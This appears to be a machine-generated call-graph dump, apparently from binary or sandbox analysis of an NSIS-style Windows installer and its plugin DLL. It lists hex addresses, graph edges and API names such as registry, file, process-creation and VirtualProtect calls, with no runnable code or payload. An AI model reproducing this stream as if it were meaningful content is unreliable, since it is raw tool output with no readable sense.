DispatchMessageW 4422->4424 4423->4412 4424->4422 4426 402d0d 4425->4426 4427 402d0f MulDiv 4425->4427 4426->4427 4427->4418 4428 402253 4429 402261 4428->4429 4430 40225b 4428->4430 4432 402b3a 18 API calls 4429->4432 4434 40226f 4429->4434 4431 402b3a 18 API calls 4430->4431 4431->4429 4432->4434 4433 402b3a 18 API calls 4436 402286 WritePrivateProfileStringW 4433->4436 4435 402b3a 18 API calls 4434->4435 4437 40227d 4434->4437 4435->4437 4437->4433 5032 402454 5033 402c44 19 API calls 5032->5033 5034 40245e 5033->5034 5035 402b1d 18 API calls 5034->5035 5036 402467 5035->5036 5037 402793 5036->5037 5038 40248b RegEnumValueW 5036->5038 5039 40247f RegEnumKeyW 5036->5039 5038->5037 5040 4024a4 RegCloseKey 5038->5040 5039->5040 5040->5037 5042 401ed4 5043 402b3a 18 API calls 5042->5043 5044 401edb 5043->5044 5045 40628b 2 API calls 5044->5045 5046 401ee1 5045->5046 5047 401ef2 5046->5047 5049 405e8f wsprintfW 5046->5049 5049->5047 4454 4022d5 4455 402305 4454->4455 4456 4022da 4454->4456 4458 402b3a 18 API calls 4455->4458 4457 402c44 19 API calls 4456->4457 4459 4022e1 4457->4459 4460 40230c 4458->4460 4461 402322 4459->4461 4462 4022eb 4459->4462 4466 402b7a RegOpenKeyExW 4460->4466 4463 402b3a 18 API calls 4462->4463 4465 4022f2 RegDeleteValueW RegCloseKey 4463->4465 4465->4461 4467 402c0e 4466->4467 4471 402ba5 4466->4471 4467->4461 4468 402bcb RegEnumKeyW 4469 402bdd RegCloseKey 4468->4469 4468->4471 4472 4062b2 3 API calls 4469->4472 4470 402c02 RegCloseKey 4475 402bf1 4470->4475 4471->4468 4471->4469 4471->4470 4473 402b7a 3 API calls 4471->4473 4474 402bed 4472->4474 4473->4471 4474->4475 4476 402c1d RegDeleteKeyW 4474->4476 4475->4467 4476->4475 4484 4014d7 4485 402b1d 18 API calls 4484->4485 4486 4014dd Sleep 4485->4486 4488 4029c7 4486->4488 4700 40335a #17 SetErrorMode OleInitialize 4701 4062b2 3 API calls 4700->4701 4702 40339d SHGetFileInfoW 4701->4702 4775 405f48 lstrcpynW 4702->4775 4704 4033c8 GetCommandLineW 4776 405f48 lstrcpynW 4704->4776 4706 4033da GetModuleHandleW 4707 4033f4 4706->4707 4708 4059c0 CharNextW 4707->4708 4709 403402 CharNextW 4708->4709 4721 403414 4709->4721 4710 403516 4711 40352a GetTempPathW 4710->4711 4777 403326 4711->4777 4713 403542 4715 403546 GetWindowsDirectoryW lstrcatW 4713->4715 4716 40359c DeleteFileW 4713->4716 4714 4059c0 CharNextW 4714->4721 4717 403326 11 API calls 4715->4717 4785 402dbc GetTickCount GetModuleFileNameW 4716->4785 4719 403562 4717->4719 4719->4716 4722 403566 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4719->4722 4720 4035b0 4728 4059c0 CharNextW 4720->4728 4758 403653 4720->4758 4770 403663 4720->4770 4721->4710 4721->4714 4723 403518 4721->4723 4724 403326 11 API calls 4722->4724 4869 405f48 lstrcpynW 4723->4869 4727 403594 4724->4727 4727->4716 4727->4770 4743 4035cf 4728->4743 4731 403772 4734 403815 ExitProcess 4731->4734 4739 4062b2 3 API calls 4731->4739 4732 40367c 4733 405724 MessageBoxIndirectW 4732->4733 4735 40368a ExitProcess 4733->4735 4736 403692 lstrcatW lstrcmpiW 4741 4036ae CreateDirectoryW SetCurrentDirectoryW 4736->4741 4736->4770 4737 40362d 4740 405a9b 18 API calls 4737->4740 4742 403785 4739->4742 4744 403639 4740->4744 4745 4036d1 4741->4745 4746 4036c6 4741->4746 4747 4062b2 3 API calls 4742->4747 4743->4736 4743->4737 4744->4770 4870 405f48 lstrcpynW 4744->4870 4882 405f48 lstrcpynW 4745->4882 4881 405f48 lstrcpynW 4746->4881 4750 40378e 4747->4750 4751 4062b2 3 API calls 4750->4751 4753 403797 4751->4753 4755 4037b5 4753->4755 4761 4037a5 GetCurrentProcess 4753->4761 4754 403648 4871 405f48 lstrcpynW 4754->4871 4759 4062b2 3 API calls 4755->4759 4757 405f6a 18 API calls 4760 403710 DeleteFileW 4757->4760 4815 40391f 4758->4815 4762 4037ec 4759->4762 4763 40371d CopyFileW 4760->4763 4772 4036df 4760->4772 4761->4755 4765 403801 ExitWindowsEx 4762->4765 4766 40380e 4762->4766 4763->4772 4764 403766 4767 405de2 40 API calls 4764->4767 4765->4734 4765->4766 4769 40140b 2 API calls 4766->4769 4767->4770 4768 405de2 40 API calls 4768->4772 4769->4734 4872 40382d 4770->4872 4771 405f6a 18 API calls 4771->4772 4772->4757 4772->4764 4772->4768 4772->4771 4774 403751 CloseHandle 4772->4774 4883 4056c3 CreateProcessW 4772->4883 4774->4772 4775->4704 4776->4706 4778 4061dc 5 API calls 4777->4778 4780 403332 4778->4780 4779 40333c 4779->4713 4780->4779 4781 405993 3 API calls 4780->4781 4782 403344 CreateDirectoryW 4781->4782 4886 405be3 4782->4886 4890 405bb4 GetFileAttributesW CreateFileW 4785->4890 4787 402dff 4814 402e0c 4787->4814 4891 405f48 lstrcpynW 4787->4891 4789 402e22 4790 4059df 2 API calls 4789->4790 4791 402e28 4790->4791 4892 405f48 lstrcpynW 4791->4892 4793 402e33 GetFileSize 4794 402f34 4793->4794 4812 402e4a 4793->4812 4795 402d1a 33 API calls 4794->4795 4796 402f3b 4795->4796 4798 402f77 GlobalAlloc 4796->4798 4796->4814 4894 40330f SetFilePointer 4796->4894 4797 4032f9 ReadFile 4797->4812 4802 402f8e 4798->4802 4799 402fcf 4800 402d1a 33 API calls 4799->4800 4800->4814 4804 405be3 2 API calls 4802->4804 4803 402f58 4805 4032f9 ReadFile 4803->4805 4807 402f9f CreateFileW 4804->4807 4808 402f63 4805->4808 4806 402d1a 33 API calls 4806->4812 4809 402fd9 4807->4809 4807->4814 4808->4798 4808->4814 4893 40330f SetFilePointer 4809->4893 4811 402fe7 4813 403062 46 API calls 4811->4813 4812->4794 4812->4797 4812->4799 4812->4806 4812->4814 4813->4814 4814->4720 4816 4062b2 3 API calls 4815->4816 4817 403933 4816->4817 4818 403939 4817->4818 4819 40394b 4817->4819 4904 405e8f wsprintfW 4818->4904 4820 405e15 3 API calls 4819->4820 4821 40397b 4820->4821 4822 40399a lstrcatW 4821->4822 4824 405e15 3 API calls 4821->4824 4825 403949 4822->4825 4824->4822 4895 403bf5 4825->4895 4828 405a9b 18 API calls 4829 4039cc 4828->4829 4830 403a60 4829->4830 4832 405e15 3 API calls 4829->4832 4831 405a9b 18 API calls 4830->4831 4833 403a66 4831->4833 4835 4039fe 4832->4835 4834 403a76 LoadImageW 4833->4834 4836 405f6a 18 API calls 4833->4836 4837 403b1c 4834->4837 4838 403a9d RegisterClassW 4834->4838 4835->4830 4839 403a1f lstrlenW 4835->4839 4843 4059c0 CharNextW 4835->4843 4836->4834 4842 40140b 2 API calls 4837->4842 4840 403ad3 SystemParametersInfoW CreateWindowExW 4838->4840 4841 403b26 4838->4841 4844 403a53 4839->4844 4845 403a2d lstrcmpiW 4839->4845 4840->4837 4841->4770 4846 403b22 4842->4846 4847 403a1c 4843->4847 4849 405993 3 API calls 4844->4849 4845->4844 4848 403a3d GetFileAttributesW 4845->4848 4846->4841 4851 403bf5 19 API calls 4846->4851 4847->4839 4850 403a49 4848->4850 4852 403a59 4849->4852 4850->4844 4853 4059df 2 API calls 4850->4853 4854 403b33 4851->4854 4905 405f48 lstrcpynW 4852->4905 4853->4844 4856 403bc2 4854->4856 4857 403b3f ShowWindow LoadLibraryW 4854->4857 4858 4052c5 5 API calls 4856->4858 4859 403b65 GetClassInfoW 4857->4859 4860 403b5e LoadLibraryW 4857->4860 4861 403bc8 4858->4861 4862 403b79 GetClassInfoW RegisterClassW 4859->4862 4863 403b8f DialogBoxParamW 4859->4863 4860->4859 4865 403be4 4861->4865 4866 403bcc 4861->4866 4862->4863 4864 40140b 2 API calls 4863->4864 4864->4841 4867 40140b 2 API calls 4865->4867 4866->4841 4868 40140b 2 API calls 4866->4868 4867->4841 4868->4841 4869->4711 4870->4754 4871->4758 4873 403848 4872->4873 4874 40383e CloseHandle 4872->4874 4875 403852 CloseHandle 4873->4875 4876 40385c 4873->4876 4874->4873 4875->4876 4907 40388a 4876->4907 4879 4057d0 71 API calls 4880 40366c OleUninitialize 4879->4880 4880->4731 4880->4732 4881->4745 4882->4772 4884 4056f2 CloseHandle 4883->4884 4885 4056fe 4883->4885 4884->4885 4885->4772 4887 405bf0 GetTickCount GetTempFileNameW 4886->4887 4888 403358 4887->4888 4889 405c26 4887->4889 4888->4713 4889->4887 4889->4888 4890->4787 4891->4789 4892->4793 4893->4811 4894->4803 4896 403c09 4895->4896 4906 405e8f wsprintfW 4896->4906 4898 403c7a 4899 405f6a 18 API calls 4898->4899 4900 403c86 SetWindowTextW 4899->4900 4901 403ca2 4900->4901 4902 4039aa 4900->4902 4901->4902 4903 405f6a 18 API calls 4901->4903 4902->4828 4903->4901 4904->4825 4905->4830 4906->4898 4908 403898 4907->4908 4909 403861 4908->4909 4910 40389d FreeLibrary GlobalFree 4908->4910 4909->4879 4910->4909 4910->4910 5057 40155b 5058 40296d 5057->5058 5061 405e8f wsprintfW 5058->5061 5060 402972 5061->5060 5062 4038dd 5063 4038e8 5062->5063 5064 4038ec 5063->5064 5065 4038ef GlobalAlloc 5063->5065 5065->5064 5066 40165e 5067 402b3a 18 API calls 5066->5067 5068 401665 5067->5068 5069 402b3a 18 API calls 5068->5069 5070 40166e 5069->5070 5071 402b3a 18 API calls 5070->5071 5072 401677 MoveFileW 5071->5072 5073 401683 5072->5073 5074 40168a 5072->5074 5076 401423 25 API calls 5073->5076 5075 40628b 2 API calls 5074->5075 5078 402197 5074->5078 5077 401699 5075->5077 5076->5078 5077->5078 5079 405de2 40 API calls 5077->5079 5079->5073 3933 4023e0 3944 402c44 3933->3944 3935 4023ea 3948 402b3a 3935->3948 3938 4023fe RegQueryValueExW 3939 402424 RegCloseKey 3938->3939 3940 40241e 3938->3940 3942 402793 3939->3942 3940->3939 3954 405e8f wsprintfW 3940->3954 3945 402b3a 18 API calls 3944->3945 3946 402c5d 3945->3946 3947 402c6b RegOpenKeyExW 3946->3947 3947->3935 3949 402b46 3948->3949 3955 405f6a 3949->3955 3951 4023f3 3951->3938 3951->3942 3954->3939 3970 405f77 3955->3970 3956 4061c2 3957 402b67 3956->3957 3989 405f48 lstrcpynW 3956->3989 3957->3951 3973 4061dc 3957->3973 3959 40602a GetVersion 3959->3970 3960 406190 lstrlenW 3960->3970 3961 405f6a 10 API calls 3961->3960 3964 4060a5 GetSystemDirectoryW 3964->3970 3966 4060b8 GetWindowsDirectoryW 3966->3970 3967 4061dc 5 API calls 3967->3970 3968 405f6a 10 API calls 3968->3970 3969 406131 lstrcatW 3969->3970 3970->3956 3970->3959 3970->3960 3970->3961 3970->3964 3970->3966 3970->3967 3970->3968 3970->3969 3971 4060ec SHGetSpecialFolderLocation 3970->3971 3982 405e15 RegOpenKeyExW 3970->3982 3987 405e8f wsprintfW 3970->3987 3988 405f48 lstrcpynW 3970->3988 3971->3970 3972 406104 SHGetPathFromIDListW CoTaskMemFree 3971->3972 3972->3970 3975 4061e9 3973->3975 3974 40625f 3976 406264 CharPrevW 3974->3976 3978 406285 3974->3978 3975->3974 3977 406252 CharNextW 3975->3977 3980 40623e CharNextW 3975->3980 3981 40624d CharNextW 3975->3981 3990 4059c0 3975->3990 3976->3974 3977->3974 3977->3975 3978->3951 3980->3975 3981->3977 3983 405e89 3982->3983 3984 405e49 RegQueryValueExW 3982->3984 3983->3970 3985 405e6a RegCloseKey 3984->3985 3985->3983 3987->3970 3988->3970 3989->3957 3991 4059c6 3990->3991 3992 4059dc 3991->3992 3993 4059cd CharNextW 3991->3993 3992->3975 3993->3991 5080 401ce5 GetDlgItem GetClientRect 5081 402b3a 18 API calls 5080->5081 5082 401d17 LoadImageW SendMessageW 5081->5082 5083 401d35 DeleteObject 5082->5083 5084 4029c7 5082->5084 5083->5084 5085 4027e5 5105 405bb4 GetFileAttributesW CreateFileW 5085->5105 5087 4027ec 5088 402895 5087->5088 5089 4027f8 GlobalAlloc 5087->5089 5092 4028b0 5088->5092 5093 40289d DeleteFileW 5088->5093 5090 402811 5089->5090 5091 40288c CloseHandle 5089->5091 5106 40330f SetFilePointer 5090->5106 5091->5088 5093->5092 5095 402817 5096 4032f9 ReadFile 5095->5096 5097 402820 GlobalAlloc 5096->5097 5098 402830 5097->5098 5099 402864 WriteFile GlobalFree 5097->5099 5101 403062 46 API calls 5098->5101 5100 403062 46 API calls 5099->5100 5102 402889 5100->5102 5104 40283d 5101->5104 5102->5091 5103 40285b GlobalFree 5103->5099 5104->5103 5105->5087 5106->5095 5107 405166 5108 405176 5107->5108 5109 40518a 5107->5109 5110 4051d3 5108->5110 5111 40517c 5108->5111 5112 405192 IsWindowVisible 5109->5112 5118 4051a9 5109->5118 5113 4051d8 CallWindowProcW 5110->5113 5114 4041e6 SendMessageW 5111->5114 5112->5110 5115 40519f 5112->5115 5117 405186 5113->5117 5114->5117 5120 404abc SendMessageW 5115->5120 5118->5113 5125 404b3c 5118->5125 5121 404b1b SendMessageW 5120->5121 5122 404adf GetMessagePos ScreenToClient SendMessageW 5120->5122 5124 404b13 5121->5124 5123 404b18 5122->5123 5122->5124 5123->5121 5124->5118 5134 405f48 lstrcpynW 5125->5134 5127 404b4f 5135 405e8f wsprintfW 5127->5135 5129 404b59 5130 40140b 2 API calls 5129->5130 5131 404b62 5130->5131 5136 405f48 lstrcpynW 5131->5136 5133 404b69 5133->5110 5134->5127 5135->5129 5136->5133 5137 4042e8 lstrlenW 5138 404307 5137->5138 5139 404309 WideCharToMultiByte 5137->5139 5138->5139 5140 401de8 EnableWindow 5141 4029c7 5140->5141 5149 100018a9 5150 100018cc 5149->5150 5151 100018ff GlobalFree 5150->5151 5152 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5150->5152 5151->5152 5153 10001272 2 API calls 5152->5153 5154 10001a87 GlobalFree GlobalFree 5153->5154 4243 40206a 4244 402b3a 18 API calls 4243->4244 4245 402071 4244->4245 4246 402b3a 18 API calls 4245->4246 4247 40207b 4246->4247 4248 402b3a 18 API calls 4247->4248 4249 402084 4248->4249 4250 402b3a 18 API calls 4249->4250 4251 40208e 4250->4251 4252 402b3a 18 API calls 4251->4252 4253 402098 4252->4253 4254 4020ac CoCreateInstance 4253->4254 4255 402b3a 18 API calls 4253->4255 4258 4020cb 4254->4258 4255->4254 4257 402197 4258->4257 4259 401423 4258->4259 4260 4051f2 25 API calls 4259->4260 4261 401431 4260->4261 4261->4257 5155 40156b 5156 401584 5155->5156 5157 40157b ShowWindow 5155->5157 5158 401592 ShowWindow 5156->5158 5159 4029c7 5156->5159 5157->5156 5158->5159 5160 404b6e GetDlgItem GetDlgItem 5161 404bc0 7 API calls 5160->5161 5169 404dd9 5160->5169 5162 404c63 DeleteObject 5161->5162 5163 404c56 SendMessageW 5161->5163 5164 404c6c 5162->5164 5163->5162 5166 404ca3 5164->5166 5168 405f6a 18 API calls 5164->5168 5165 404ebd 5167 404f69 5165->5167 5176 404f16 SendMessageW 5165->5176 5202 404dcc 5165->5202 5170 40419a 19 API calls 5166->5170 5171 404f73 SendMessageW 5167->5171 5172 404f7b 5167->5172 5173 404c85 SendMessageW SendMessageW 5168->5173 5169->5165 5180 404abc 5 API calls 5169->5180 5203 404e4a 5169->5203 5174 404cb7 5170->5174 5171->5172 5179 404fa4 5172->5179 5185 404f94 5172->5185 5186 404f8d ImageList_Destroy 5172->5186 5173->5164 5175 40419a 19 API calls 5174->5175 5181 404cc5 5175->5181 5183 404f2b SendMessageW 5176->5183 5176->5202 5177 404201 8 API calls 5184 40515f 5177->5184 5178 404eaf SendMessageW 5178->5165 5182 405113 5179->5182 5201 404b3c 4 API calls 5179->5201 5207 404fdf 5179->5207 5180->5203 5188 404d9a GetWindowLongW SetWindowLongW 5181->5188 5195 404d15 SendMessageW 5181->5195 5197 404d94 5181->5197 5199 404d51 SendMessageW 5181->5199 5200 404d62 SendMessageW 5181->5200 5189 405125 ShowWindow GetDlgItem ShowWindow 5182->5189 5182->5202 5191 404f3e 5183->5191 5185->5179 5187 404f9d GlobalFree 5185->5187 5186->5185 5187->5179 5190 404db3 5188->5190 5189->5202 5192 404dd1 5190->5192 5193 404db9 ShowWindow 5190->5193 5196 404f4f SendMessageW 5191->5196 5212 4041cf SendMessageW 5192->5212 5211 4041cf SendMessageW 5193->5211 5195->5181 5196->5167 5197->5188 5197->5190 5199->5181 5200->5181 5201->5207 5202->5177 5203->5165 5203->5178 5204 4050e9 InvalidateRect 5204->5182 5205 4050ff 5204->5205 5213 4049d6 5205->5213 5206 40500d SendMessageW 5210 405023 5206->5210 5207->5206 5207->5210 5209 405097 SendMessageW SendMessageW 5209->5210 5210->5204 5210->5209 5211->5202 5212->5169 5214 4049f3 5213->5214 5215 405f6a 18 API calls 5214->5215 5216 404a28 5215->5216 5217 405f6a 18 API calls 5216->5217 5218 404a33 5217->5218 5219 405f6a 18 API calls 5218->5219 5220 404a64 lstrlenW wsprintfW SetDlgItemTextW 5219->5220 5220->5182 5221 4024ee 5222 4024f3 5221->5222 5223 40250c 5221->5223 5224 402b1d 18 API calls 5222->5224 5225 402512 5223->5225 5226 40253e 5223->5226 5231 4024fa 5224->5231 5227 402b3a 18 API calls 5225->5227 5228 402b3a 18 API calls 5226->5228 5229 402519 WideCharToMultiByte lstrlenA 5227->5229 5230 402545 lstrlenW 5228->5230 5229->5231 5230->5231 5232 402567 WriteFile 5231->5232 5233 402793 5231->5233 5232->5233 5234 4045ee 5235 404624 5234->5235 5236 4045fe 5234->5236 5238 404201 8 API calls 5235->5238 5237 40419a 19 API calls 5236->5237 5239 40460b SetDlgItemTextW 5237->5239 5240 404630 5238->5240 5239->5235 5241 4018ef 5242 401926 5241->5242 5243 402b3a 18 API calls 5242->5243 5244 40192b 5243->5244 5245 4057d0 71 API calls 5244->5245 5246 401934 5245->5246 5247 404970 5248 404980 5247->5248 5249 40499c 5247->5249 5258 405708 GetDlgItemTextW 5248->5258 5251 4049a2 SHGetPathFromIDListW 5249->5251 5252 4049cf 5249->5252 5254 4049b2 5251->5254 5257 4049b9 SendMessageW 5251->5257 5253 40498d SendMessageW 5253->5249 5255 40140b 2 API calls 5254->5255 5255->5257 5257->5252 5258->5253 5259 402770 5260 402b3a 18 API calls 5259->5260 5261 402777 FindFirstFileW 5260->5261 5262 40278a 5261->5262 5263 40279f 5261->5263 5264 4027a8 5263->5264 5267 405e8f wsprintfW 5263->5267 5268 405f48 lstrcpynW 5264->5268 5267->5264 5268->5262 5269 4014f1 SetForegroundWindow 5270 4029c7 5269->5270 5271 4018f2 5272 402b3a 18 API calls 5271->5272 5273 4018f9 5272->5273 5274 405724 MessageBoxIndirectW 5273->5274 5275 401902 5274->5275 4438 402573 4450 402b1d 4438->4450 4440 4026a0 4441 4025c8 ReadFile 4441->4440 4445 402582 4441->4445 4442 405c37 ReadFile 4442->4445 4443 4026a2 4453 405e8f wsprintfW 4443->4453 4444 402608 MultiByteToWideChar 4444->4445 4445->4440 4445->4441 4445->4442 4445->4443 4445->4444 4447 40262e SetFilePointer MultiByteToWideChar 4445->4447 4448 4026b3 4445->4448 4447->4445 4448->4440 4449 4026d4 SetFilePointer 4448->4449 4449->4440 4451 405f6a 18 API calls 4450->4451 4452 402b31 4451->4452 4452->4445 4453->4440 5276 401df3 5277 402b3a 18 API calls 5276->5277 5278 401df9 5277->5278 5279 402b3a 18 API calls 5278->5279 5280 401e02 5279->5280 5281 402b3a 18 API calls 5280->5281 5282 401e0b 5281->5282 5283 402b3a 18 API calls 5282->5283 5284 401e14 5283->5284 5285 401423 25 API calls 5284->5285 5286 401e1b ShellExecuteW 5285->5286 5287 401e4c 5286->5287 5293 100016b6 5294 100016e5 5293->5294 5295 10001b18 22 API calls 5294->5295 5296 100016ec 5295->5296 5297 100016f3 5296->5297 5298 100016ff 5296->5298 5299 10001272 2 API calls 5297->5299 5300 10001726 5298->5300 5301 10001709 5298->5301 5304 100016fd 5299->5304 5302 10001750 5300->5302 5303 1000172c 5300->5303 5305 1000153d 3 API calls 5301->5305 5307 1000153d 3 API calls 5302->5307 5306 100015b4 3 API calls 5303->5306 5308 1000170e 5305->5308 5309 10001731 5306->5309 5307->5304 5310 100015b4 3 API calls 5308->5310 5312 10001272 2 API calls 5309->5312 5311 10001714 5310->5311 5313 10001272 2 API calls 5311->5313 5314 10001737 GlobalFree 5312->5314 5315 1000171a GlobalFree 5313->5315 5314->5304 5316 1000174b GlobalFree 5314->5316 5315->5304 5316->5304 5317 10002238 5318 10002296 5317->5318 5319 100022cc 5317->5319 5318->5319 5320 100022a8 GlobalAlloc 5318->5320 5320->5318 4672 4026f9 4673 402700 4672->4673 4676 402972 4672->4676 4674 402b1d 18 API calls 4673->4674 4675 40270b 4674->4675 4677 402712 SetFilePointer 4675->4677 4677->4676 4678 402722 4677->4678 4680 405e8f wsprintfW 4678->4680 4680->4676 5321 1000103d 5324 1000101b 5321->5324 5331 10001516 5324->5331 5326 10001020 5327 10001024 5326->5327 5328 10001027 GlobalAlloc 5326->5328 5329 1000153d 3 API calls 5327->5329 5328->5327 5330 1000103b 5329->5330 5333 1000151c 5331->5333 5332 10001522 5332->5326 5333->5332 5334 1000152e GlobalFree 5333->5334 5334->5326 5335 402c7f 5336 402c91 SetTimer 5335->5336 5337 402caa 5335->5337 5336->5337 5338 402cf8 5337->5338 5339 402cfe MulDiv 5337->5339 5340 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5339->5340 5340->5338 5342 4014ff 5343 401507 5342->5343 5345 40151a 5342->5345 5344 402b1d 18 API calls 5343->5344 5344->5345 5346 401000 5347 401037 BeginPaint GetClientRect 5346->5347 5350 40100c DefWindowProcW 5346->5350 5348 4010f3 5347->5348 5352 401073 CreateBrushIndirect FillRect DeleteObject 5348->5352 5353 4010fc 5348->5353 5351 401179 5350->5351 5352->5348 5354 401102 CreateFontIndirectW 5353->5354 5355 401167 EndPaint 5353->5355 5354->5355 5356 401112 6 API calls 5354->5356 5355->5351 5356->5355 5357 401a00 5358 402b3a 18 API calls 5357->5358 5359 401a09 ExpandEnvironmentStringsW 5358->5359 5360 401a1d 5359->5360 5362 401a30 5359->5362 5361 401a22 lstrcmpW 5360->5361 5360->5362 5361->5362 5363 401b01 5364 402b3a 18 API calls 5363->5364 5365 401b08 5364->5365 5366 402b1d 18 API calls 5365->5366 5367 401b11 wsprintfW 5366->5367 5368 4029c7 5367->5368 4240 100027c7 4241 10002817 4240->4241 4242 100027d7 VirtualProtect 4240->4242 4242->4241 5376 401f08 5377 402b3a 18 API calls 5376->5377 5378 401f0f GetFileVersionInfoSizeW 5377->5378 5379 401f36 GlobalAlloc 5378->5379 5380 401f8c 5378->5380 5379->5380 5381 401f4a GetFileVersionInfoW 5379->5381 5381->5380 5382 401f59 VerQueryValueW 5381->5382 5382->5380 5383 401f72 5382->5383 5387 405e8f wsprintfW 5383->5387 5385 401f7e 5388 405e8f wsprintfW 5385->5388 5387->5385 5388->5380 5389 401c8e 5390 402b1d 18 API calls 5389->5390 5391 401c94 IsWindow 5390->5391 5392 4019f0 5391->5392 5393 1000164f 5394 10001516 GlobalFree 5393->5394 5396 10001667 5394->5396 5395 100016ad GlobalFree 5396->5395 5397 10001682 5396->5397 5398 10001699 VirtualFree 5396->5398 5397->5395 5398->5395 5406 401491 5407 4051f2 25 API calls 5406->5407 5408 401498 5407->5408 4477 402295 4478 402b3a 18 API calls 4477->4478 4479 4022a4 4478->4479 4480 402b3a 18 API calls 4479->4480 4481 4022ad 4480->4481 4482 402b3a 18 API calls 4481->4482 4483 4022b7 GetPrivateProfileStringW 4482->4483 4489 401f98 4490 40205c 4489->4490 4491 401faa 4489->4491 4494 401423 25 API calls 4490->4494 4492 402b3a 18 API calls 4491->4492 4493 401fb1 4492->4493 4495 402b3a 18 API calls 4493->4495 4499 402197 4494->4499 4496 401fba 4495->4496 4497 401fd0 LoadLibraryExW 4496->4497 4498 401fc2 GetModuleHandleW 4496->4498 4497->4490 4500 401fe1 4497->4500 4498->4497 4498->4500 4512 40631e WideCharToMultiByte 4500->4512 4503 401ff2 4506 402011 4503->4506 4507 401ffa 4503->4507 4504 40202b 4505 4051f2 25 API calls 4504->4505 4508 402002 4505->4508 4515 10001759 4506->4515 4509 401423 25 API calls 4507->4509 4508->4499 4510 40204e FreeLibrary 4508->4510 4509->4508 4510->4499 4513 406348 GetProcAddress 4512->4513 4514 401fec 4512->4514 4513->4514 4514->4503 4514->4504 4516 10001789 4515->4516 4557 10001b18 4516->4557 4518 10001790 4519 100018a6 4518->4519 4520 100017a1 4518->4520 4521 100017a8 4518->4521 4519->4508 4606 10002286 4520->4606 4589 100022d0 4521->4589 4526 100017cd 4528 1000180c 4526->4528 4529 100017ee 4526->4529 4527 100017be 4531 100017c4 4527->4531 4536 100017cf 4527->4536 4532 10001812 4528->4532 4533 1000184e 4528->4533 4619 100024a9 4529->4619 4531->4526 4600 100028a4 4531->4600 4538 100015b4 3 API calls 4532->4538 4540 100024a9 10 API calls 4533->4540 4534 100017d7 4534->4526 4616 10002b5f 4534->4616 4535 100017f4 4630 100015b4 4535->4630 4610 10002645 4536->4610 4543 10001828 4538->4543 4544 10001840 4540->4544 4547 100024a9 10 API calls 4543->4547 4548 10001895 4544->4548 4641 1000246c 4544->4641 4546 100017d5 4546->4526 4547->4544 4548->4519 4552 1000189f GlobalFree 4548->4552 4552->4519 4554 10001881 4554->4548 4645 1000153d wsprintfW 4554->4645 4555 1000187a FreeLibrary 4555->4554 4648 1000121b GlobalAlloc 4557->4648 4559 10001b3c 4649 1000121b GlobalAlloc 4559->4649 4561 10001d7a GlobalFree GlobalFree GlobalFree 4562 10001d97 4561->4562 4573 10001de1 4561->4573 4564 100020ee 4562->4564 4572 10001dac 4562->4572 4562->4573 4563 10001b47 4563->4561 4565 10001c1d GlobalAlloc 4563->4565 4567 10001c86 GlobalFree 4563->4567 4570 10001c68 lstrcpyW 4563->4570 4563->4573 4574 10001c72 lstrcpyW 4563->4574 4578 10002048 4563->4578 4582 10001f37 GlobalFree 4563->4582 4586 1000122c 2 API calls 4563->4586 4587 10001cc4 4563->4587 4655 1000121b GlobalAlloc 4563->4655 4566 10002110 GetModuleHandleW 4564->4566 4564->4573 4565->4563 4568 10002121 LoadLibraryW 4566->4568 4569 10002136 4566->4569 4567->4563 4568->4569 4568->4573 4656 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4569->4656 4570->4574 4572->4573 4652 1000122c 4572->4652 4573->4518 4574->4563 4575 10002188 4575->4573 4576 10002195 lstrlenW 4575->4576 4657 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4576->4657 4578->4573 4581 10002090 lstrcpyW 4578->4581 4581->4573 4582->4563 4583 10002148 4583->4575 4588 10002172 GetProcAddress 4583->4588 4584 100021af 4584->4573 4586->4563 4587->4563 4650 1000158f GlobalSize GlobalAlloc 4587->4650 4588->4575 4590 100022e8 4589->4590 4592 10002415 GlobalFree 4590->4592 4593 100023d3 lstrlenW 4590->4593 4594 100023ba GlobalAlloc CLSIDFromString 4590->4594 4595 1000238f GlobalAlloc WideCharToMultiByte 4590->4595 4597 1000122c GlobalAlloc lstrcpynW 4590->4597 4659 100012ba 4590->4659 4592->4590 4596 100017ae 4592->4596 4593->4592 4599 100023de 4593->4599 4594->4592 4595->4592 4596->4526 4596->4527 4596->4534 4597->4590 4599->4592 4663 100025d9 4599->4663 4602 100028b6 4600->4602 4601 1000295b EnumWindows 4603 10002979 4601->4603 4602->4601 4604 10002a75 4603->4604 4605 10002a6a GetLastError 4603->4605 4604->4526 4605->4604 4607 10002296 4606->4607 4609 100017a7 4606->4609 4608 100022a8 GlobalAlloc 4607->4608 4607->4609 4608->4607 4609->4521 4614 10002661 4610->4614 4611 100026b2 GlobalAlloc 4615 100026d4 4611->4615 4612 100026c5 4613 100026ca GlobalSize 4612->4613 4612->4615 4613->4615 4614->4611 4614->4612 4615->4546 4617 10002b6a 4616->4617 4618 10002baa GlobalFree 4617->4618 4666 1000121b GlobalAlloc 4619->4666 4621 10002530 StringFromGUID2 4624 100024b3 4621->4624 4622 10002541 lstrcpynW 4622->4624 4623 1000250b MultiByteToWideChar 4623->4624 4624->4621 4624->4622 4624->4623 4625 10002554 wsprintfW 4624->4625 4626 10002571 GlobalFree 4624->4626 4627 100025ac GlobalFree 4624->4627 4628 10001272 2 API calls 4624->4628 4667 100012e1 4624->4667 4625->4624 4626->4624 4627->4535 4628->4624 4671 1000121b GlobalAlloc 4630->4671 4632 100015ba 4633 100015c7 lstrcpyW 4632->4633 4635 100015e1 4632->4635 4636 100015fb 4633->4636 4635->4636 4637 100015e6 wsprintfW 4635->4637 4638 10001272 4636->4638 4637->4636 4639 100012b5 GlobalFree 4638->4639 4640 1000127b GlobalAlloc lstrcpynW 4638->4640 4639->4544 4640->4639 4642 10001861 4641->4642 4643 1000247a 4641->4643 4642->4554 4642->4555 4643->4642 4644 10002496 GlobalFree 4643->4644 4644->4643 4646 10001272 2 API calls 4645->4646 4647 1000155e 4646->4647 4647->4548 4648->4559 4649->4563 4651 100015ad 4650->4651 4651->4587 4658 1000121b GlobalAlloc 4652->4658 4654 1000123b lstrcpynW 4654->4573 4655->4563 4656->4583 4657->4584 4658->4654 4660 100012c1 4659->4660 4661 1000122c 2 API calls 4660->4661 4662 100012df 4661->4662 4662->4590 4664 100025e7 VirtualAlloc 4663->4664 4665 1000263d 